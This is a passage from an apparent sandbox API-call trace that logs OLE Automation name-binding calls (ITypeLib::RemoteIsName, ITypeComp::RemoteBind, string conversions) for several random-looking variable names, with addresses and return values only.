pDummy=0x0) returned 0x0 [0069.696] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KZk1Ux") returned 0x10df75 [0069.696] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="KZk1Ux" | out: _Dst="KZk1Ux") returned 0x0 [0069.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="KZk1Ux") returned 7 [0069.696] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.696] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KZk1Ux", lHashVal=0x10df75, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.696] IUnknown:Release (This=0x665ba50) returned 0xd [0069.696] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.696] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KZk1Ux", lHashVal=0x10df75, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.696] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.696] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.696] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KZk1Ux", lHashVal=0x10df75, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.696] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.696] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.696] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KZk1Ux", lHashVal=0x10df75, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.696] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81906, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KZk1Ux") returned 7 [0069.696] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KZk1Ux", lHashVal=0x10df75, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.697] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.697] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81906 | out: _Dst=0x67c2d40) returned 0x0 [0069.697] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KZk1Ux") returned 0x1059df [0069.697] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_KZk1Ux" | out: _Dst="_B_var_KZk1Ux") returned 0x0 [0069.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_KZk1Ux") returned 14 [0069.697] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.697] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KZk1Ux", lHashVal=0x1059df, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.697] IUnknown:Release (This=0x665ba50) returned 0xd [0069.697] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.697] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KZk1Ux", lHashVal=0x1059df, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.697] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.697] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.697] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KZk1Ux", lHashVal=0x1059df, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.697] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.697] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.697] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KZk1Ux", lHashVal=0x1059df, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.697] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.697] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.697] IUnknown:Release (This=0x665ba50) returned 0xd [0069.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870bee, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_KZk1Ux") returned 14 [0069.697] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KZk1Ux", lHashVal=0x1059df, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x55003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x55003100000000, pDummy=0x0) returned 0x0 [0069.697] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81906 | out: _Dst=0x144ec0) returned 0x0 [0069.697] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cUD1AG", lHashVal=0x10e5bb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8192e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cUD1AG") returned 7 [0069.697] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cUD1AG", lHashVal=0x10e5bb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8192e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cUD1AG") returned 7 [0069.698] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cUD1AG", lHashVal=0x10e5bb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.698] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cUD1AG") returned 0x10e5bb [0069.698] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="cUD1AG" | out: _Dst="cUD1AG") returned 0x0 [0069.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="cUD1AG") returned 7 [0069.698] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.698] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cUD1AG", lHashVal=0x10e5bb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.698] IUnknown:Release (This=0x665ba50) returned 0xd [0069.698] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.698] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cUD1AG", lHashVal=0x10e5bb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.698] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.698] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.698] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="cUD1AG", lHashVal=0x10e5bb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.698] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.698] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.698] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cUD1AG", lHashVal=0x10e5bb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.698] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8192e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cUD1AG") returned 7 [0069.698] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cUD1AG", lHashVal=0x10e5bb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.698] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.698] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8192e | out: _Dst=0x67c2d40) returned 0x0 [0069.698] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cUD1AG") returned 0x106025 [0069.698] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_cUD1AG" | out: _Dst="_B_var_cUD1AG") returned 0x0 [0069.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_cUD1AG") returned 14 [0069.698] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.699] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cUD1AG", lHashVal=0x106025, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.699] IUnknown:Release (This=0x665ba50) returned 0xd [0069.699] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.699] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cUD1AG", lHashVal=0x106025, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.699] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.699] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.699] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cUD1AG", lHashVal=0x106025, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.699] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.699] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.699] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cUD1AG", lHashVal=0x106025, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.699] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.699] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.699] IUnknown:Release (This=0x665ba50) returned 0xd [0069.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870c1e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_cUD1AG") returned 14 [0069.699] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cUD1AG", lHashVal=0x106025, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0) returned 0x0 [0069.699] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8192e | out: _Dst=0x144ec0) returned 0x0 [0069.699] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zxQ4cA", lHashVal=0x10bf52, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81956, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zxQ4cA") returned 7 [0069.699] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zxQ4cA", lHashVal=0x10bf52, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81956, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zxQ4cA") returned 7 [0069.699] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zxQ4cA", lHashVal=0x10bf52, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.699] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zxQ4cA") returned 0x10bf52 [0069.699] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zxQ4cA" | out: _Dst="zxQ4cA") returned 0x0 [0069.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zxQ4cA") returned 7 [0069.700] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.700] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zxQ4cA", lHashVal=0x10bf52, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.700] IUnknown:Release (This=0x665ba50) returned 0xd [0069.700] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.700] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zxQ4cA", lHashVal=0x10bf52, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.700] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.700] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.700] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zxQ4cA", lHashVal=0x10bf52, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.700] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.700] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.700] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zxQ4cA", lHashVal=0x10bf52, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.700] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81956, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zxQ4cA") returned 7 [0069.700] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zxQ4cA", lHashVal=0x10bf52, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.700] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.700] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81956 | out: _Dst=0x67c2d40) returned 0x0 [0069.700] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zxQ4cA") returned 0x1039bc [0069.700] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zxQ4cA" | out: _Dst="_B_var_zxQ4cA") returned 0x0 [0069.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zxQ4cA") returned 14 [0069.700] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.700] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zxQ4cA", lHashVal=0x1039bc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.700] IUnknown:Release (This=0x665ba50) returned 0xd [0069.700] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.700] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zxQ4cA", lHashVal=0x1039bc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.700] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.700] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.701] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zxQ4cA", lHashVal=0x1039bc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.701] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.701] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.701] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zxQ4cA", lHashVal=0x1039bc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.701] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.701] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.701] IUnknown:Release (This=0x665ba50) returned 0xd [0069.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870c4e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_zxQ4cA") returned 14 [0069.701] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zxQ4cA", lHashVal=0x1039bc, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x63003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x63003400000000, pDummy=0x0) returned 0x0 [0069.701] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81956 | out: _Dst=0x144ec0) returned 0x0 [0069.701] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aAQQCQD", lHashVal=0x10198d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b819a6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="aAQQCQD") returned 8 [0069.701] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aAQQCQD", lHashVal=0x10198d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b819a6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="aAQQCQD") returned 8 [0069.701] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aAQQCQD", lHashVal=0x10198d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.701] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aAQQCQD") returned 0x10198d [0069.701] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="aAQQCQD" | out: _Dst="aAQQCQD") returned 0x0 [0069.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="aAQQCQD") returned 8 [0069.701] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.701] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aAQQCQD", lHashVal=0x10198d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.701] IUnknown:Release (This=0x665ba50) returned 0xd [0069.701] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.701] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aAQQCQD", lHashVal=0x10198d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.702] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.702] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.702] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aAQQCQD", lHashVal=0x10198d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.702] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.702] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.702] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aAQQCQD", lHashVal=0x10198d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.702] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b819a6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="aAQQCQD") returned 8 [0069.702] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aAQQCQD", lHashVal=0x10198d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.702] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.702] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b819a6 | out: _Dst=0x67c2d40) returned 0x0 [0069.702] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aAQQCQD") returned 0x100d90 [0069.702] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_aAQQCQD" | out: _Dst="_B_var_aAQQCQD") returned 0x0 [0069.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_aAQQCQD") returned 15 [0069.702] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.702] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aAQQCQD", lHashVal=0x100d90, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.702] IUnknown:Release (This=0x665ba50) returned 0xd [0069.702] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.702] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aAQQCQD", lHashVal=0x100d90, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.702] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.702] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.702] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aAQQCQD", lHashVal=0x100d90, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.702] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.702] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.702] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aAQQCQD", lHashVal=0x100d90, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.702] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.703] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.703] IUnknown:Release (This=0x665ba50) returned 0xd [0069.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870c7e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_aAQQCQD") returned 15 [0069.703] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aAQQCQD", lHashVal=0x100d90, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0) returned 0x0 [0069.703] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b819a6 | out: _Dst=0x144ec0) returned 0x0 [0069.703] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lQCQ1AA", lHashVal=0x10cd91, wFlags=0x5, ppTInfo=0x144cf8, 